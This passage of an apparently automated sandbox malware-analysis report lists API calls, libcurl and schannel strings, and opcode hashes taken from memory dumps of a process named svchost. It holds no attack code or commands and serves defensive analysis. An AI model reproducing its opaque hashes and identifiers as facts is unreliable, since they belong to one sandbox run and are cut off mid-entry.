                          • _errno.MSVCRT ref: 64946F95
                          • QueryPerformanceFrequency.KERNEL32 ref: 64946FB5
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: AdjustmentFrequencyPerformanceQuerySystemTime_errno
                          • String ID:
                          • API String ID: 931094001-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CryptRandommemset
                          • String ID:
                          • API String ID: 642379960-0
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup$inet_pton$_time64callocmallocqsortstrchrstrncmp
                          • String ID: /$/$Included max number of cookies (%zu) in request!
                          • API String ID: 3681627800-3317691674
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: CONNECT need to close+open$CONNECT phase completed$CONNECT receive$CONNECT response$CONNECT send$CONNECT start$CONNECT tunnel established, response %d$CONNECT tunnel failed, response %d$Connect me again please$Establish HTTP proxy tunnel to %s$Failed sending CONNECT to proxy$Proxy CONNECT aborted due to timeout$new tunnel state 'connect'$new tunnel state 'established'$new tunnel state 'failed'$new tunnel state 'init'$new tunnel state 'receive'$new tunnel state 'response'
                          • API String ID: 1294909896-470889996
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: strchrstrcspn$_strdup
                          • String ID: %s: %s$Date$Host$X-%s-Date$host:%s$x-%s-date:%s
                          • API String ID: 2662505157-2873700390
                          APIs
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CA5
                            • Part of subcall function 00007FFDA5580C70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CB8
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CDF
                            • Part of subcall function 00007FFDA5580C70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CEC
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CE575
                          • CloseHandle.KERNEL32 ref: 00007FFDA55CE719
                          • GetLastError.KERNEL32 ref: 00007FFDA55CE75B
                            • Part of subcall function 00007FFDA55BA3B0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA55BA419
                            • Part of subcall function 00007FFDA55BA3B0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA55BA423
                            • Part of subcall function 00007FFDA55BA3B0: GetLastError.KERNEL32 ref: 00007FFDA55BA42B
                            • Part of subcall function 00007FFDA55BA3B0: SetLastError.KERNEL32 ref: 00007FFDA55BA437
                          • GetLastError.KERNEL32 ref: 00007FFDA55CE541
                            • Part of subcall function 00007FFDA55BA3B0: GetLastError.KERNEL32 ref: 00007FFDA55BA3D2
                            • Part of subcall function 00007FFDA55BA3B0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA55BA3DA
                          • CreateFileW.KERNEL32 ref: 00007FFDA55CE5AE
                          • GetLastError.KERNEL32 ref: 00007FFDA55CE5BD
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CE722
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CE72B
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$free$_errno$ByteCharMultiWide$CloseCreateFileHandlemalloc
                          • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                          • API String ID: 2498712895-3430970913
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: mallocmemchrstrncmp
                          • String ID: ../$..?$/$/$/..$/../$/..?$/./$/.?
                          • API String ID: 2664245045-515720033
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: strchr$strtoul$memmove
                          • String ID: (non-permanent)$:%u$Added %.*s:%d:%s to DNS cache%s$Bad syntax CURLOPT_RESOLVE removal entry '%s'$Couldn't parse CURLOPT_RESOLVE entry '%s'$RESOLVE %.*s:%d - old addresses discarded$RESOLVE *:%d using wildcard$Resolve address '%s' found illegal
                          • API String ID: 505971213-2408895650
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdupcallocfreemallocstrrchr
                          • String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
                          • API String ID: 3403504057-4131979473
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup$calloc
                          • String ID: application/octet-stream$k
                          • API String ID: 149330190-2522224428
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup$calloc
                          • String ID: application/octet-stream$k
                          • API String ID: 149330190-2522224428
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup
                          • String ID: .netrc$.netrc parser error$Couldn't find host %s in the %s file; using defaults
                          • API String ID: 2653869212-330727394
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: %lld$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$timeout$tsize
                          • API String ID: 1294909896-1106908834
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdup$callocfree
                          • String ID:
                          • API String ID: 1183638330-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CertCertificateContextFree
                          • String ID: schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle$schannel: server selected an ALPN protocol too late
                          • API String ID: 3080675121-1264606989
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Sleep$CreateEvent
                          • String ID:
                          • API String ID: 1576368186-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdup
                          • String ID: application/octet-stream$k
                          • API String ID: 1169197092-2522224428
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdup
                          • String ID: application/octet-stream$k
                          • API String ID: 1169197092-2522224428
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: strchr$free
                          • String ID: HTTP/1.0 proxy connection set to keep alive$HTTP/1.1 proxy connection set close$Negotiate: noauthpersist -> %d, header part: %s$Persistent-Auth:$Proxy-Connection:$Proxy-authenticate:$close$false$keep-alive
                          • API String ID: 3578582447-3982183773
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: add0b55f31ea5315e63d18e07a67bae7d110dbd47902aebcef5392f5d948f21e
                          • Instruction ID: a14f8d48b23b407c0caef3e42c94915cf9a1de498c67eaa9080d39279b3d5208
                          • Opcode Fuzzy Hash: add0b55f31ea5315e63d18e07a67bae7d110dbd47902aebcef5392f5d948f21e
                          • Instruction Fuzzy Hash: 4721987E64AB05C2D702AF25E9A823C33B4FB8AF997100025DE4E43B59CF78D499C365
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup
                          • String ID: application/octet-stream$k
                          • API String ID: 2653869212-2522224428
                          • Opcode ID: de1c18a33a8226ade4d38b042767e0601d4dd691b8d68a6b6e67acb496470743
                          • Instruction ID: bc5a2f5d76d55431d81231e2024b2136c390d974f270a1129d5d2259ab80d416
                          • Opcode Fuzzy Hash: de1c18a33a8226ade4d38b042767e0601d4dd691b8d68a6b6e67acb496470743
                          • Instruction Fuzzy Hash: 33B1607AB0AB4995EB6A8F15D46033827A1EB46F58F5809B4CE9D073D6DF3CE841D308
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$k
                          • API String ID: 0-2522224428
                          • Opcode ID: 5d7c280c46b4d2e0b7470f727e2e430a54cf03afdcea3e54c162465bc49df8b1
                          • Instruction ID: db99003b55388fdbf73d16fb2b1f5252721bd39b253918d8be72362b8e694b49
                          • Opcode Fuzzy Hash: 5d7c280c46b4d2e0b7470f727e2e430a54cf03afdcea3e54c162465bc49df8b1
                          • Instruction Fuzzy Hash: BEB17F7AB0AB4995EB6A8F15946032827E1EB46F58F5809B4CE9D073D6DF3CD841D308
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup
                          • String ID: application/octet-stream$k
                          • API String ID: 2653869212-2522224428
                          • Opcode ID: 7e9c4b969ef8d293e174c56025b9b73a82eff97ca4d88b718424fc2538e9700c
                          • Instruction ID: 0f710e4f64b94309f1682c5123cf6a78986ca9b8e8ed2602e6db9460691cb887
                          • Opcode Fuzzy Hash: 7e9c4b969ef8d293e174c56025b9b73a82eff97ca4d88b718424fc2538e9700c
                          • Instruction Fuzzy Hash: 63B16E7AB0AB4995EB6A8F15D46033927A1EB46F98F5809B4CE9C073D6DF3CD841D308
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$k
                          • API String ID: 0-2522224428
                          • Opcode ID: ba0641887a76c748bcb6e38eaa71c167e20de8602d7cceee5f9270d3bdd708fa
                          • Instruction ID: 7350470a1cb77d7d89d41be09449eeb500adefba43f40e0233d63f9f9fc2afac
                          • Opcode Fuzzy Hash: ba0641887a76c748bcb6e38eaa71c167e20de8602d7cceee5f9270d3bdd708fa
                          • Instruction Fuzzy Hash: 4CA16E7AB0AB4995EB6A8F15946032827E1FB46F98F5809B4CE9D073D6DF3CD841D308
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$k
                          • API String ID: 0-2522224428
                          • Opcode ID: 3b37e7022defceadeff34084eb6a48a0daac0f8275bd3d1c27efead74be8efdc
                          • Instruction ID: 3f02b0d9e0c91225b734b32272870ef522805bae53ba3073e4348bcf9539a2fb
                          • Opcode Fuzzy Hash: 3b37e7022defceadeff34084eb6a48a0daac0f8275bd3d1c27efead74be8efdc
                          • Instruction Fuzzy Hash: 14A15E7AB0AB4995EB6A8F15946032823E1EB46F58F580AB4CE9D077D6DF3CD841D308
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$k
                          • API String ID: 0-2522224428
                          • Opcode ID: 6deba298d6cd6c49c7c3245b1ac95cae2971440002267693c2592f4b961341f3
                          • Instruction ID: 02d1b3218d2795662393898720a0d6c97bbef31d69b05c07c18c064e5c871790
                          • Opcode Fuzzy Hash: 6deba298d6cd6c49c7c3245b1ac95cae2971440002267693c2592f4b961341f3
                          • Instruction Fuzzy Hash: 1CA16D7AB0AB4995EB6A8F15D46032823A1FB46F58F580AB4CE9D077D6DF3CD841D308
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:
                          • API String ID: 1294909896-1147549499
                          • Opcode ID: b210a9faa6451965c232b38086ed7f33c4090e639266d07f48b4962e36949d2c
                          • Instruction ID: e8be085f19cd671efd887cbfa42a57c8833585d4908b9582a20687fa2b752af8
                          • Opcode Fuzzy Hash: b210a9faa6451965c232b38086ed7f33c4090e639266d07f48b4962e36949d2c
                          • Instruction Fuzzy Hash: 2A418119B0E61A41FE1AEF26A53937A1291AF87FC0F454131E90E07BD7EF2CE4028309
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 0e340849c521c2b7505d7d747180e8081549875e4a4220a0cde0145afa1cd23e
                          • Instruction ID: 0b40b70570ebefc000bf4132c996001ce32c9b2637a478c89a1d138842a8f2b2
                          • Opcode Fuzzy Hash: 0e340849c521c2b7505d7d747180e8081549875e4a4220a0cde0145afa1cd23e
                          • Instruction Fuzzy Hash: D331B73AB4AB84A6E74E9F25EA642A9B374F785F50F480025DB6D03752CF38E474C354
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$Sleep$select
                          • String ID:
                          • API String ID: 2442476585-0
                          • Opcode ID: 0844dcefc245e9baac62046afd1de4330d4d8e678802450620b30691e6808a79
                          • Instruction ID: 7d37fc44148af442d5128b50c0378d28762ec8914c418466bc2a3575b398c31b
                          • Opcode Fuzzy Hash: 0844dcefc245e9baac62046afd1de4330d4d8e678802450620b30691e6808a79
                          • Instruction Fuzzy Hash: 03A1DA2AB0A6CA86EB6B4F16D4283792295FF46F64F104A34DB19577C6DF3ED940C308
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: EventHandleInformation
                          • String ID:
                          • API String ID: 943243487-0
                          • Opcode ID: 0abebdb6bbe18b6591d2f169ee2d49ccc49482f9618223d758f2abb39a9272bf
                          • Instruction ID: c02d53f5b47e4eab209d974f5deb7cec8a0e804993d913822503880e7c3ff0c7
                          • Opcode Fuzzy Hash: 0abebdb6bbe18b6591d2f169ee2d49ccc49482f9618223d758f2abb39a9272bf
                          • Instruction Fuzzy Hash: 1C41B232682640CAEB55CF75D8003696B65EB86FBCF144225CF2E8B395EF39C145C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
                          • String ID:
                          • API String ID: 2941551293-0
                          • Opcode ID: 41f481ae3904839b845b6b966e47d7c0d9084ec4171bca2e1ba02052f09d8d33
                          • Instruction ID: 9b255bf73e60d4f51aa72ff79eaf3e3afad282202bf316635f7d93ce8b392ba6
